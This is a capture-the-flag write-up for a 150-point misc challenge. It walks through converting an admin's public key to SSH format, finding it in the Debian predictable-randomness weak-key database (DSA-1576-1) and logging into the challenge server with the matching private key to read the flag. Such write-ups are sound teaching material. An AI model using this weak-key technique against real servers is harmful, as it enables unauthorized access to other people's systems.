Points: 150 Category: misc Author: vladz

Introduction

While browsing the given website, we understand that the admin:

  • is a huge fan of Debian ;
  • is using the string “jan0sh” as login ;
  • is using the same OpenSSL key pair for everything (data signing, SSH, etc.) ;
  • hosts a SSH service on fanboy.uni.hctf.fun (port 2222).

We retrieve jan0sh’s public key used for data signing and we convert it into a SSH public key format:

# wget -q http://fanboy.uni.hctf.fun/posts/pubkey.pem
# ssh-keygen -f ./pubkey.pem -i -mPKCS8 > pubkey_ssh.pub
# cat pubkey_ssh.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAvowhzrTHPoF+oBRkS187VWHPG86+A2zBD9J+jmLT0ThBX0o71XtjEkCOtMJWTyqCScGKzlHTicwe80iTxtO6hof9kXAz6P2P/S3V+xWbOeaxAmD2LWCK7fcmaR6LpInkBqNUWZdShgvswS6n/M1CurK8BywAHLsQHDvyWnSroOo428qHDBTCzMtkiXH6ng8KQKIrQT20KrK2FgOJe24BwNMo2i+tcykCnGLDseZOTX7JmckMXTMXILv2pDfgxFAvCVNMo7q5hnnTmqyRZexcqapDqO/eBs01jNAj6T4wuWv4HqpG3PzcbpUf6JR1z5hmR/+7KR39ynxGLI3fnbtdhQ==

Vulnerability

In 2008, Debian’s OpenSSH was prone to a predictable randomness vulnerability which resulted in insecure insecure keys generations (cf. DSA-1576-1). This file contains a database of thousand corrupted SSH keys.

Luckily, our key was in this database:

# for i in rsa/2048/*.pub; do grep -q "[...]BqNUWZdShgvs[...]" $i && echo $i; done
rsa/2048/38b2cc8ca9cff6705d8556bbe7682e82-9707.pub

Exploitation

We copied the associated private key into ~/.ssh/id_rsa and connect to the remote server with:

# cp rsa/2048/38b2cc8ca9cff6705d8556bbe7682e82-9707 ~/.ssh/id_rsa
# ssh -4x -p 2222 jan0sh@fanboy.uni.hctf.fun
[...]
Last login: Sun Oct 28 12:45:52 2018 from 172.18.0.1
$ ls
flag.txt
$ cat flag.txt
flag{I_guess_random_numbers_are_important_lol}

Pwntera

Yet another french CTF team that sux !